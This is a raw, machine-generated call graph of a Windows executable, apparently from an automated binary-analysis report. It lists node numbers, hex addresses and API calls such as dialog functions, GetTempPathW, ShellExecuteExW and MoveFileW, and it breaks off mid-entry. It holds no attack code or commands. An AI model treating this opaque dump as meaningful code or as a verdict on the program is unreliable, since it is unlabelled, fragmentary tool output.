33 API calls 22898->22899 22900 7ff7c0184f85 22899->22900 22907 7ff7c0184190 99 API calls _com_raise_error 22900->22907 22906->22895 22908 7ff7c018e760 22911 7ff7c018e7c0 SystemTimeToFileTime 22908->22911 22912 7ff7c018e832 22911->22912 22913 7ff7c018e8b7 22911->22913 22914 7ff7c0186768 9 API calls 22912->22914 22915 7ff7c01a5c30 _handle_error 8 API calls 22913->22915 22916 7ff7c018e837 22914->22916 22917 7ff7c018e7bb 22915->22917 22918 7ff7c018e842 LocalFileTimeToFileTime 22916->22918 22919 7ff7c018e84e FileTimeToSystemTime TzSpecificLocalTimeToSystemTime SystemTimeToFileTime SystemTimeToFileTime 22916->22919 22918->22913 22919->22913 22924 7ff7c01b0e5c 22925 7ff7c01b0ea7 22924->22925 22929 7ff7c01b0e6b abort 22924->22929 22931 7ff7c01b0bac 15 API calls _set_fmode 22925->22931 22927 7ff7c01b0e8e RtlAllocateHeap 22928 7ff7c01b0ea5 22927->22928 22927->22929 22929->22925 22929->22927 22930 7ff7c01af0c8 abort 2 API calls 22929->22930 22930->22929 22931->22928 20430 7ff7c01a5a00 20431 7ff7c01a5a16 _com_error::_com_error 20430->20431 20436 7ff7c01a7848 20431->20436 20433 7ff7c01a5a27 20441 7ff7c01a5390 20433->20441 20437 7ff7c01a7884 RtlPcToFileHeader 20436->20437 20438 7ff7c01a7867 20436->20438 20439 7ff7c01a789c 20437->20439 20440 7ff7c01a78ab RaiseException 20437->20440 20438->20437 20439->20440 20440->20433 20467 7ff7c01a4fe8 20441->20467 20444 7ff7c01a541b 20445 7ff7c01a52f8 DloadReleaseSectionWriteAccess 6 API calls 20444->20445 20446 7ff7c01a5428 RaiseException 20445->20446 20447 7ff7c01a5645 20446->20447 20448 7ff7c01a54cd LoadLibraryExA 20450 7ff7c01a54e4 GetLastError 20448->20450 20451 7ff7c01a5539 20448->20451 20449 7ff7c01a5615 20475 7ff7c01a52f8 20449->20475 20455 7ff7c01a54f9 20450->20455 20456 7ff7c01a550e 20450->20456 20454 7ff7c01a554d 20451->20454 20457 7ff7c01a5544 FreeLibrary 20451->20457 20452 7ff7c01a5444 20452->20448 20452->20449 20452->20451 20452->20454 20453 7ff7c01a55ab GetProcAddress 20453->20449 20460 7ff7c01a55c0 GetLastError 20453->20460 20454->20449 20454->20453 20455->20451 20455->20456 20459 7ff7c01a52f8 DloadReleaseSectionWriteAccess 6 API calls 20456->20459 20457->20454 20461 7ff7c01a551b RaiseException 20459->20461 20462 7ff7c01a55d5 20460->20462 20461->20447 20462->20449 20463 7ff7c01a52f8 DloadReleaseSectionWriteAccess 6 API calls 20462->20463 20464 7ff7c01a55f7 RaiseException 20463->20464 20465 7ff7c01a4fe8 DloadAcquireSectionWriteAccess 6 API calls 20464->20465 20466 7ff7c01a5611 20465->20466 20466->20449 20468 7ff7c01a5063 20467->20468 20469 7ff7c01a4ffe 20467->20469 20468->20444 20468->20452 20483 7ff7c01a5094 20469->20483 20472 7ff7c01a505e 20474 7ff7c01a5094 DloadReleaseSectionWriteAccess 3 API calls 20472->20474 20474->20468 20476 7ff7c01a5308 20475->20476 20482 7ff7c01a5361 20475->20482 20477 7ff7c01a5094 DloadReleaseSectionWriteAccess 3 API calls 20476->20477 20478 7ff7c01a530d 20477->20478 20479 7ff7c01a535c 20478->20479 20480 7ff7c01a5268 DloadProtectSection 3 API calls 20478->20480 20481 7ff7c01a5094 DloadReleaseSectionWriteAccess 3 API calls 20479->20481 20480->20479 20481->20482 20482->20447 20484 7ff7c01a50af 20483->20484 20485 7ff7c01a5003 20483->20485 20484->20485 20486 7ff7c01a50b4 GetModuleHandleW 20484->20486 20485->20472 20490 7ff7c01a5268 20485->20490 20487 7ff7c01a50c9 20486->20487 20488 7ff7c01a50ce GetProcAddress 20486->20488 20487->20485 20488->20487 20489 7ff7c01a50e3 GetProcAddress 20488->20489 20489->20487 20491 7ff7c01a528a DloadProtectSection 20490->20491 20492 7ff7c01a5292 20491->20492 20493 7ff7c01a52ca VirtualProtect 20491->20493 20495 7ff7c01a5134 VirtualQuery GetSystemInfo 20491->20495 20492->20472 20493->20492 20495->20493 21483 7ff7c01af40c 21490 7ff7c01b0470 21483->21490 21495 7ff7c01b0950 35 API calls 2 library calls 21490->21495 21492 7ff7c01b047b 21496 7ff7c01b0570 35 API calls abort 21492->21496 21495->21492 21498 7ff7c019ece0 21843 7ff7c018215c 21498->21843 21500 7ff7c019ed2b 21501 7ff7c019ed3f 21500->21501 21502 7ff7c019f9e3 21500->21502 21550 7ff7c019ed5c 21500->21550 21506 7ff7c019ed4f 21501->21506 21507 7ff7c019ee2b 21501->21507 21501->21550 22076 7ff7c01a2ee0 21502->22076 21505 7ff7c01a5c30 _handle_error 8 API calls 21510 7ff7c019fea0 21505->21510 21511 7ff7c019ed57 21506->21511 21512 7ff7c019edf9 21506->21512 21513 7ff7c019eee1 21507->21513 21518 7ff7c019ee45 21507->21518 21508 7ff7c019fa0a IsDlgButtonChecked 21509 7ff7c019fa19 21508->21509 21514 7ff7c019fa40 GetDlgItem IsDlgButtonChecked 21509->21514 21515 7ff7c019fa25 SendDlgItemMessageW 21509->21515 21521 7ff7c018aee0 48 API calls 21511->21521 21511->21550 21517 7ff7c019ee1b EndDialog 21512->21517 21512->21550 21851 7ff7c0181ebc GetDlgItem 21513->21851 21520 7ff7c0187a28 35 API calls 21514->21520 21515->21514 21517->21550 21522 7ff7c018aee0 48 API calls 21518->21522 21524 7ff7c019fa97 GetDlgItem 21520->21524 21525 7ff7c019ed86 21521->21525 21526 7ff7c019ee63 SetDlgItemTextW 21522->21526 21523 7ff7c019ef01 EndDialog 21701 7ff7c019ef2a 21523->21701 22095 7ff7c0182120 21524->22095 22098 7ff7c0181a94 34 API calls _handle_error 21525->22098 21527 7ff7c019ee76 21526->21527 21536 7ff7c019ee90 GetMessageW 21527->21536 21527->21550 21530 7ff7c019ef58 GetDlgItem 21531 7ff7c019ef9f SetFocus 21530->21531 21532 7ff7c019ef72 IsDlgButtonChecked IsDlgButtonChecked 21530->21532 21537 7ff7c019f042 21531->21537 21538 7ff7c019efb5 21531->21538 21532->21531 21535 7ff7c019ed96 21540 7ff7c019edac 21535->21540 22099 7ff7c018210c 21535->22099 21543 7ff7c019eeae IsDialogMessageW 21536->21543 21536->21550 21542 7ff7c0182314 33 API calls 21537->21542 21545 7ff7c018aee0 48 API calls 21538->21545 21540->21550 21555 7ff7c019feb3 21540->21555 21548 7ff7c019f07c 21542->21548 21543->21527 21549 7ff7c019eec3 TranslateMessage DispatchMessageW 21543->21549 21544 7ff7c019f815 21551 7ff7c018aee0 48 API calls 21544->21551 21552 7ff7c019efbf 21545->21552 21546 7ff7c0181b70 31 API calls 21546->21550 22102 7ff7c01a2ad0 33 API calls 2 library calls 21548->22102 21549->21527 21550->21505 21556 7ff7c019f826 SetDlgItemTextW 21551->21556 21566 7ff7c01812bc 33 API calls 21552->21566 21561 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21555->21561 21560 7ff7c018aee0 48 API calls 21556->21560 21559 7ff7c019f087 21564 7ff7c018aee0 48 API calls 21559->21564 21565 7ff7c019f858 21560->21565 21567 7ff7c019feb8 21561->21567 21569 7ff7c019f0a5 21564->21569 21580 7ff7c01812bc 33 API calls 21565->21580 21570 7ff7c019efe8 21566->21570 21576 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21567->21576 21573 7ff7c018da04 48 API calls 21569->21573 21865 7ff7c01a2bf4 21570->21865 21578 7ff7c019f0b8 21573->21578 21582 7ff7c019febe 21576->21582 21587 7ff7c01a2bf4 24 API calls 21578->21587 21602 7ff7c019f881 21580->21602 21593 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21582->21593 21590 7ff7c019f0c8 21587->21590 21600 7ff7c0181b70 31 API calls 21590->21600 21592 7ff7c019f92a 21595 7ff7c018aee0 48 API calls 21592->21595 21610 7ff7c019fec4 21593->21610 21609 7ff7c019f934 21595->21609 21614 7ff7c019f0d6 21600->21614 21602->21592 21619 7ff7c01812bc 33 API calls 21602->21619 21606 7ff7c019f13c 21607 7ff7c019f16a 21606->21607 22104 7ff7c018587c 21606->22104 21879 7ff7c018552c 21607->21879 21630 7ff7c01812bc 33 API calls 21609->21630 21617 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21610->21617 21614->21582 21624 7ff7c019f038 21614->21624 21623 7ff7c019feca 21617->21623 21625 7ff7c019f8cf 21619->21625 21635 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21623->21635 21624->21606 22103 7ff7c01a3584 33 API calls 2 library calls 21624->22103 21631 7ff7c018aee0 48 API calls 21625->21631 21628 7ff7c019f184 GetLastError 21629 7ff7c019f19c 21628->21629 21640 7ff7c0188cf8 SetCurrentDirectoryW 21629->21640 21634 7ff7c019f95d 21630->21634 21637 7ff7c019f8da 21631->21637 21633 7ff7c019f15e 22107 7ff7c019d908 12 API calls _handle_error 21633->22107 21650 7ff7c01812bc 33 API calls 21634->21650 21641 7ff7c019fed0 21635->21641 22127 7ff7c0181170 33 API calls BuildCatchObjectHelperInternal 21637->22127 21644 7ff7c019f1ae 21640->21644 21651 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21641->21651 21648 7ff7c019f1c4 21644->21648 21649 7ff7c019f1b5 GetLastError 21644->21649 21646 7ff7c019f8f2 21656 7ff7c0181c04 33 API calls 21646->21656 21653 7ff7c019f26c 21648->21653 21657 7ff7c019f27b 21648->21657 21658 7ff7c019f1db GetTickCount 21648->21658 21649->21648 21654 7ff7c019f99e 21650->21654 21655 7ff7c019fed6 21651->21655 21653->21657 21675 7ff7c019f6c9 21653->21675 21669 7ff7c0181b70 31 API calls 21654->21669 21659 7ff7c018215c 61 API calls 21655->21659 21660 7ff7c019f90e 21656->21660 21661 7ff7c019f5a0 21657->21661 21666 7ff7c0187c10 34 API calls 21657->21666 21891 7ff7c0185238 21658->21891 21663 7ff7c019ff34 21659->21663 21665 7ff7c0181b70 31 API calls 21660->21665 21661->21523 22116 7ff7c0186e5c 21661->22116 21670 7ff7c019ff38 21663->21670 21678 7ff7c019ffd9 GetDlgItem SetFocus 21663->21678 21702 7ff7c019ff4d 21663->21702 21672 7ff7c019f91c 21665->21672 21673 7ff7c019f29e 21666->21673 21677 7ff7c019f9c8 21669->21677 21679 7ff7c01a5c30 _handle_error 8 API calls 21670->21679 21681 7ff7c0181b70 31 API calls 21672->21681 22108 7ff7c018bc90 131 API calls 21673->22108 21690 7ff7c018aee0 48 API calls 21675->21690 21686 7ff7c0181b70 31 API calls 21677->21686 21683 7ff7c01a000a 21678->21683 21687 7ff7c01a05e7 21679->21687 21681->21592 21695 7ff7c01812bc 33 API calls 21683->21695 21684 7ff7c019f20a 21689 7ff7c0181b70 31 API calls 21684->21689 21692 7ff7c019f9d3 21686->21692 21688 7ff7c019f2b8 21694 7ff7c018da04 48 API calls 21688->21694 21696 7ff7c019f218 21689->21696 21697 7ff7c019f6f7 SetDlgItemTextW 21690->21697 21691 7ff7c019f5da 21698 7ff7c018aee0 48 API calls 21691->21698 21699 7ff7c0181b70 31 API calls 21692->21699 21693 7ff7c019ff84 SendDlgItemMessageW 21703 7ff7c019ffa4 21693->21703 21704 7ff7c019ffad EndDialog 21693->21704 21705 7ff7c019f2fa GetCommandLineW 21694->21705 21706 7ff7c01a001c 21695->21706 21901 7ff7c0184334 21696->21901 21707 7ff7c0182134 21697->21707 21700 7ff7c019f5e7 21698->21700 21699->21701 22125 7ff7c0181170 33 API calls BuildCatchObjectHelperInternal 21700->22125 21701->21546 21702->21670 21702->21693 21703->21704 21704->21670 21710 7ff7c019f39f 21705->21710 21711 7ff7c019f3b9 21705->21711 22128 7ff7c0188e0c 21706->22128 21708 7ff7c019f715 SetDlgItemTextW GetDlgItem 21707->21708 21714 7ff7c019f740 GetWindowLongPtrW SetWindowLongPtrW 21708->21714 21715 7ff7c019f763 21708->21715 21728 7ff7c0181c80 33 API calls 21710->21728 22109 7ff7c019e6a4 33 API calls _handle_error 21711->22109 21714->21715 21917 7ff7c01a09d8 21715->21917 21716 7ff7c019f5fa 21721 7ff7c0181b70 31 API calls 21716->21721 21727 7ff7c019f605 21721->21727 21722 7ff7c018210c SetDlgItemTextW 21729 7ff7c01a0044 21722->21729 21723 7ff7c019f3ca 22110 7ff7c019e6a4 33 API calls _handle_error 21723->22110 21724 7ff7c019f254 21731 7ff7c018424c 100 API calls 21724->21731 21725 7ff7c019f245 GetLastError 21725->21724 21733 7ff7c0181b70 31 API calls 21727->21733 21728->21711 21738 7ff7c01a0076 SendDlgItemMessageW FindFirstFileW 21729->21738 21735 7ff7c019f261 21731->21735 21732 7ff7c01a09d8 188 API calls 21736 7ff7c019f78c 21732->21736 21737 7ff7c019f613 21733->21737 21734 7ff7c019f3db 22111 7ff7c019e6a4 33 API calls _handle_error 21734->22111 21740 7ff7c0181b70 31 API calls 21735->21740 22068 7ff7c01a34c4 21736->22068 21747 7ff7c018aee0 48 API calls 21737->21747 21742 7ff7c01a00cb 21738->21742 21836 7ff7c01a0554 21738->21836 21740->21653 21752 7ff7c018aee0 48 API calls 21742->21752 21743 7ff7c019f3ec 22112 7ff7c018bd30 131 API calls 21743->22112 21746 7ff7c01a09d8 188 API calls 21763 7ff7c019f7ba 21746->21763 21751 7ff7c019f62b 21747->21751 21748 7ff7c019f403 22113 7ff7c01a36e0 33 API calls 21748->22113 21749 7ff7c01a05d1 21749->21670 21750 7ff7c01a05f9 21755 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21750->21755 21764 7ff7c01812bc 33 API calls 21751->21764 21757 7ff7c01a00ee 21752->21757 21754 7ff7c019f422 CreateFileMappingW 21758 7ff7c019f461 MapViewOfFile 21754->21758 21759 7ff7c019f4a3 ShellExecuteExW 21754->21759 21760 7ff7c01a05fe 21755->21760 21756 7ff7c019f7e6 22126 7ff7c0181e98 GetDlgItem EnableWindow 21756->22126 21766 7ff7c01812bc 33 API calls 21757->21766 22114 7ff7c01a6e10 21758->22114 21772 7ff7c019f4c4 21759->21772 21767 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21760->21767 21763->21756 21768 7ff7c01a09d8 188 API calls 21763->21768 21778 7ff7c019f654 21764->21778 21765 7ff7c019ef45 21765->21523 21765->21544 21769 7ff7c01a011d 21766->21769 21770 7ff7c01a0604 21767->21770 21768->21756 22132 7ff7c0181170 33 API calls BuildCatchObjectHelperInternal 21769->22132 21776 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21770->21776 21774 7ff7c019f513 21772->21774 21775 7ff7c019f4e6 WaitForInputIdle 21772->21775 21773 7ff7c01a0138 21779 7ff7c01852c0 33 API calls 21773->21779 21785 7ff7c019f53f 21774->21785 21786 7ff7c019f52c UnmapViewOfFile CloseHandle 21774->21786 21780 7ff7c019f4fb 21775->21780 21781 7ff7c01a060a 21776->21781 21777 7ff7c019f6aa 21782 7ff7c0181b70 31 API calls 21777->21782 21778->21623 21778->21777 21783 7ff7c01a014f 21779->21783 21780->21774 21784 7ff7c019f501 Sleep 21780->21784 21789 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21781->21789 21782->21523 21787 7ff7c0181b70 31 API calls 21783->21787 21784->21774 21784->21780 21785->21610 21788 7ff7c019f575 21785->21788 21786->21785 21790 7ff7c01a015c 21787->21790 21792 7ff7c0181b70 31 API calls 21788->21792 21791 7ff7c01a0610 21789->21791 21790->21760 21794 7ff7c0181b70 31 API calls 21790->21794 21795 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21791->21795 21793 7ff7c019f592 21792->21793 21796 7ff7c0181b70 31 API calls 21793->21796 21797 7ff7c01a01c3 21794->21797 21798 7ff7c01a0616 21795->21798 21796->21661 21799 7ff7c018210c SetDlgItemTextW 21797->21799 21801 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21798->21801 21800 7ff7c01a01d7 FindClose 21799->21800 21802 7ff7c01a01f3 21800->21802 21803 7ff7c01a02e7 SendDlgItemMessageW 21800->21803 21804 7ff7c01a061c 21801->21804 22133 7ff7c019de44 10 API calls _handle_error 21802->22133 21805 7ff7c01a031b 21803->21805 21808 7ff7c018aee0 48 API calls 21805->21808 21807 7ff7c01a0216 21809 7ff7c018aee0 48 API calls 21807->21809 21810 7ff7c01a0328 21808->21810 21811 7ff7c01a021f 21809->21811 21813 7ff7c01812bc 33 API calls 21810->21813 21812 7ff7c018da04 48 API calls 21811->21812 21818 7ff7c01a023c BuildCatchObjectHelperInternal 21812->21818 21815 7ff7c01a0357 21813->21815 21814 7ff7c0181b70 31 API calls 21816 7ff7c01a02d3 21814->21816 22134 7ff7c0181170 33 API calls BuildCatchObjectHelperInternal 21815->22134 21819 7ff7c018210c SetDlgItemTextW 21816->21819 21818->21770 21818->21814 21819->21803 21820 7ff7c01a0372 21821 7ff7c01852c0 33 API calls 21820->21821 21822 7ff7c01a0389 21821->21822 21823 7ff7c0181b70 31 API calls 21822->21823 21824 7ff7c01a0395 BuildCatchObjectHelperInternal 21823->21824 21825 7ff7c0181b70 31 API calls 21824->21825 21826 7ff7c01a03cf 21825->21826 21827 7ff7c0181b70 31 API calls 21826->21827 21828 7ff7c01a03dc 21827->21828 21828->21781 21829 7ff7c0181b70 31 API calls 21828->21829 21830 7ff7c01a0443 21829->21830 21831 7ff7c018210c SetDlgItemTextW 21830->21831 21832 7ff7c01a0457 21831->21832 21832->21836 22135 7ff7c019de44 10 API calls _handle_error 21832->22135 21834 7ff7c01a0482 21835 7ff7c018aee0 48 API calls 21834->21835 21837 7ff7c01a048c 21835->21837 21836->21670 21836->21749 21836->21750 21836->21798 21838 7ff7c018da04 48 API calls 21837->21838 21840 7ff7c01a04a9 BuildCatchObjectHelperInternal 21838->21840 21839 7ff7c0181b70 31 API calls 21841 7ff7c01a0540 21839->21841 21840->21791 21840->21839 21842 7ff7c018210c SetDlgItemTextW 21841->21842 21842->21836 21844 7ff7c01821d0 21843->21844 21845 7ff7c018216a 21843->21845 21844->21500 21845->21844 22136 7ff7c018a8ac 21845->22136 21847 7ff7c018218f 21847->21844 21848 7ff7c01821a4 GetDlgItem 21847->21848 21848->21844 21849 7ff7c01821b7 21848->21849 21849->21844 21850 7ff7c01821be SetDlgItemTextW 21849->21850 21850->21844 21852 7ff7c0181efc 21851->21852 21853 7ff7c0181f34 21851->21853 21855 7ff7c01812bc 33 API calls 21852->21855 22185 7ff7c0181ff8 GetWindowTextLengthW 21853->22185 21856 7ff7c0181f2a BuildCatchObjectHelperInternal 21855->21856 21857 7ff7c0181f89 21856->21857 21858 7ff7c0181b70 31 API calls 21856->21858 21861 7ff7c0181ff0 21857->21861 21862 7ff7c0181fc8 21857->21862 21858->21857 21859 7ff7c01a5c30 _handle_error 8 API calls 21860 7ff7c0181fdd 21859->21860 21860->21523 21860->21530 21860->21765 21863 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21861->21863 21862->21859 21864 7ff7c0181ff5 21863->21864 22197 7ff7c019e96c PeekMessageW 21865->22197 21868 7ff7c01a2c93 IsDlgButtonChecked IsDlgButtonChecked 21870 7ff7c01a2cf4 IsDlgButtonChecked 21868->21870 21871 7ff7c01a2cd9 21868->21871 21869 7ff7c01a2c45 21872 7ff7c01a2c51 ShowWindow IsDlgButtonChecked IsDlgButtonChecked 21869->21872 21873 7ff7c01a2d13 21870->21873 21874 7ff7c01a2d16 IsDlgButtonChecked IsDlgButtonChecked 21870->21874 21871->21870 21872->21868 21873->21874 21875 7ff7c01a2d43 IsDlgButtonChecked 21874->21875 21876 7ff7c01a2d68 IsDlgButtonChecked 21874->21876 21875->21876 21877 7ff7c01a5c30 _handle_error 8 API calls 21876->21877 21878 7ff7c019eff5 21877->21878 21878->21567 21878->21624 21880 7ff7c0185562 21879->21880 21886 7ff7c0185671 21879->21886 21883 7ff7c018564b 21880->21883 21885 7ff7c01812bc 33 API calls 21880->21885 21888 7ff7c018569c 21880->21888 22202 7ff7c0185c60 21880->22202 21881 7ff7c01a5c30 _handle_error 8 API calls 21882 7ff7c0185687 21881->21882 21882->21628 21882->21629 21884 7ff7c0185c60 56 API calls 21883->21884 21883->21886 21884->21886 21885->21880 21886->21881 21889 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21888->21889 21890 7ff7c01856a1 21889->21890 21892 7ff7c0185265 21891->21892 21893 7ff7c018527a 21892->21893 21894 7ff7c01812bc 33 API calls 21892->21894 21895 7ff7c01a5c30 _handle_error 8 API calls 21893->21895 21894->21893 21896 7ff7c01852b1 21895->21896 21897 7ff7c019d1bc 21896->21897 21898 7ff7c019d1e3 21897->21898 22236 7ff7c01860e0 21898->22236 21900 7ff7c019d1f3 BuildCatchObjectHelperInternal 21900->21684 21903 7ff7c018436a 21901->21903 21902 7ff7c018439e 21905 7ff7c018447f 21902->21905 21907 7ff7c01880b0 49 API calls 21902->21907 21903->21902 21904 7ff7c01843b1 CreateFileW 21903->21904 21904->21902 21906 7ff7c01844af 21905->21906 21912 7ff7c0181c80 33 API calls 21905->21912 21908 7ff7c01a5c30 _handle_error 8 API calls 21906->21908 21909 7ff7c0184409 21907->21909 21913 7ff7c01844c4 21908->21913 21910 7ff7c018440d CreateFileW 21909->21910 21911 7ff7c0184446 21909->21911 21910->21911 21911->21905 21914 7ff7c01844d8 21911->21914 21912->21906 21913->21724 21913->21725 21915 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21914->21915 21916 7ff7c01844dd 21915->21916 22245 7ff7c019e558 21917->22245 21919 7ff7c01a0d3e 21920 7ff7c0181b70 31 API calls 21919->21920 21921 7ff7c01a0d47 21920->21921 21922 7ff7c01a5c30 _handle_error 8 API calls 21921->21922 21924 7ff7c019f77b 21922->21924 21923 7ff7c018d124 33 API calls 21994 7ff7c01a0a53 BuildCatchObjectHelperInternal 21923->21994 21924->21732 21925 7ff7c01a2a4a 22334 7ff7c018353c 47 API calls 21925->22334 21928 7ff7c01a2a50 22335 7ff7c018353c 47 API calls 21928->22335 21931 7ff7c01a2a3e 21933 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21931->21933 21932 7ff7c01a2a56 21934 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21932->21934 21935 7ff7c01a2a44 21933->21935 21936 7ff7c01a2a5c 21934->21936 22333 7ff7c018353c 47 API calls 21935->22333 21939 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21936->21939 21940 7ff7c01a2a62 21939->21940 21945 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21940->21945 21941 7ff7c01a299a 21942 7ff7c01a2a22 21941->21942 21946 7ff7c0181c80 33 API calls 21941->21946 22331 7ff7c0181b50 RtlPcToFileHeader RaiseException _com_raise_error std::bad_alloc::bad_alloc 21942->22331 21943 7ff7c01a2a38 22332 7ff7c0181bd4 33 API calls std::_Xinvalid_argument 21943->22332 21944 7ff7c01813c4 33 API calls 21948 7ff7c01a178a GetTempPathW 21944->21948 21949 7ff7c01a2a68 21945->21949 21947 7ff7c01a29c7 21946->21947 22330 7ff7c019e738 33 API calls 3 library calls 21947->22330 21948->21994 21955 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21949->21955 21950 7ff7c0187a28 35 API calls 21950->21994 21954 7ff7c01a29dd 21963 7ff7c0181b70 31 API calls 21954->21963 21966 7ff7c01a29f4 BuildCatchObjectHelperInternal 21954->21966 21960 7ff7c01a2a6e 21955->21960 21956 7ff7c0182120 SetDlgItemTextW 21956->21994 21957 7ff7c01888f8 33 API calls 21957->21994 21959 7ff7c01af094 43 API calls 21959->21994 21967 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21960->21967 21962 7ff7c01a2343 21962->21942 21962->21943 21965 7ff7c01a5ae0 4 API calls 21962->21965 21977 7ff7c01a238b BuildCatchObjectHelperInternal 21962->21977 21963->21966 21964 7ff7c0181b70 31 API calls 21964->21942 21965->21977 21966->21964 21969 7ff7c01a2a74 21967->21969 21968 7ff7c019e558 33 API calls 21968->21994 21976 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21969->21976 21971 7ff7c0181c80 33 API calls 21971->21994 21972 7ff7c01a2abc 22338 7ff7c0181bd4 33 API calls std::_Xinvalid_argument 21972->22338 21973 7ff7c01a2ac8 22340 7ff7c0181bd4 33 API calls std::_Xinvalid_argument 21973->22340 21974 7ff7c01a2890 21974->21973 21980 7ff7c01a288b BuildCatchObjectHelperInternal 21974->21980 21982 7ff7c01a2ac2 21974->21982 22008 7ff7c01a5ae0 4 API calls 21974->22008 21975 7ff7c01a27c2 BuildCatchObjectHelperInternal 22250 7ff7c01a3030 21975->22250 21981 7ff7c01a2a7a 21976->21981 21985 7ff7c0181c80 33 API calls 21977->21985 22023 7ff7c01a26df 21977->22023 21979 7ff7c0181b70 31 API calls 21979->21941 21980->21979 21990 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21981->21990 22339 7ff7c0181b50 RtlPcToFileHeader RaiseException _com_raise_error std::bad_alloc::bad_alloc 21982->22339 21984 7ff7c01a2ab6 22337 7ff7c0181b50 RtlPcToFileHeader RaiseException _com_raise_error std::bad_alloc::bad_alloc 21984->22337 21991 7ff7c01a24b3 21985->21991 21989 7ff7c01a277a 21989->21972 21989->21975 21989->21980 21989->21984 22005 7ff7c01a5ae0 4 API calls 21989->22005 21997 7ff7c01a2a80 21990->21997 22004 7ff7c01812bc 33 API calls 21991->22004 22036 7ff7c01a2ab0 21991->22036 21994->21919 21994->21923 21994->21925 21994->21928 21994->21931 21994->21932 21994->21935 21994->21936 21994->21940 21994->21941 21994->21944 21994->21949 21994->21950 21994->21956 21994->21957 21994->21959 21994->21960 21994->21962 21994->21968 21994->21969 21994->21971 21994->21981 21995 7ff7c019d6d8 31 API calls 21994->21995 21996 7ff7c01852c0 33 API calls 21994->21996 21994->21997 21998 7ff7c0185ff4 51 API calls 21994->21998 22002 7ff7c018db98 33 API calls 21994->22002 22012 7ff7c01a2a86 21994->22012 22015 7ff7c01872ac 53 API calls 21994->22015 22016 7ff7c01a118c IsDlgButtonChecked 21994->22016 22021 7ff7c01862f0 54 API calls 21994->22021 22022 7ff7c01a2a8c 21994->22022 22029 7ff7c0182314 33 API calls 21994->22029 22030 7ff7c01a2a92 21994->22030 22031 7ff7c01a14ae SHFileOperationW 21994->22031 22034 7ff7c0185238 33 API calls 21994->22034 22038 7ff7c0186dd8 33 API calls 21994->22038 22039 7ff7c018587c 51 API calls 21994->22039 22041 7ff7c01871f4 33 API calls 21994->22041 22043 7ff7c018210c SetDlgItemTextW 21994->22043 22047 7ff7c0188b28 47 API calls 21994->22047 22052 7ff7c0181c04 33 API calls 21994->22052 22053 7ff7c0181b70 31 API calls 21994->22053 22054 7ff7c0182274 31 API calls 21994->22054 22056 7ff7c01812bc 33 API calls 21994->22056 22058 7ff7c0185890 51 API calls 21994->22058 22060 7ff7c01a1ae9 EndDialog 21994->22060 22062 7ff7c01a1671 MoveFileW 21994->22062 22066 7ff7c018552c 56 API calls 21994->22066 22249 7ff7c0190aa0 CompareStringW 21994->22249 22289 7ff7c018ce9c 35 API calls _invalid_parameter_noinfo_noreturn 21994->22289 22290 7ff7c019d26c 33 API calls Concurrency::cancel_current_task 21994->22290 22291 7ff7c01a3f3c 31 API calls _invalid_parameter_noinfo_noreturn 21994->22291 22292 7ff7c0188ebc 47 API calls BuildCatchObjectHelperInternal 21994->22292 22293 7ff7c019e384 33 API calls _invalid_parameter_noinfo_noreturn 21994->22293 22294 7ff7c019d154 33 API calls 21994->22294 22295 7ff7c019df84 145 API calls 2 library calls 21994->22295 22296 7ff7c019e738 33 API calls 3 library calls 21994->22296 22297 7ff7c0186448 33 API calls 21994->22297 22298 7ff7c0187d6c 33 API calls 3 library calls 21994->22298 22299 7ff7c018885c 21994->22299 22303 7ff7c0181734 33 API calls 4 library calls 21994->22303 22304 7ff7c0185790 21994->22304 22318 7ff7c0181170 33 API calls BuildCatchObjectHelperInternal 21994->22318 22319 7ff7c0186260 FindClose 21994->22319 22320 7ff7c0190ad0 CompareStringW 21994->22320 22321 7ff7c019d848 47 API calls 21994->22321 22322 7ff7c019c414 51 API calls 3 library calls 21994->22322 22323 7ff7c019e6a4 33 API calls _handle_error 21994->22323 22324 7ff7c0187254 CompareStringW 21994->22324 22325 7ff7c0188be4 47 API calls 21994->22325 21995->21994 21996->21994 22009 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21997->22009 21998->21994 22000 7ff7c01a1139 GetDlgItem 22007 7ff7c0182120 SetDlgItemTextW 22000->22007 22002->21994 22010 7ff7c01a24f6 22004->22010 22005->21975 22011 7ff7c01a1158 IsDlgButtonChecked 22007->22011 22008->21980 22009->22012 22326 7ff7c018d124 22010->22326 22011->21994 22017 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22012->22017 22015->21994 22016->21994 22017->22022 22021->21994 22024 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22022->22024 22023->21974 22023->21989 22026 7ff7c01a2aa4 22023->22026 22027 7ff7c01a2aaa 22023->22027 22024->22030 22028 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22026->22028 22033 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22027->22033 22028->22027 22029->21994 22037 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22030->22037 22031->21994 22033->22036 22034->21994 22035 7ff7c0190aa0 CompareStringW 22059 7ff7c01a2521 22035->22059 22336 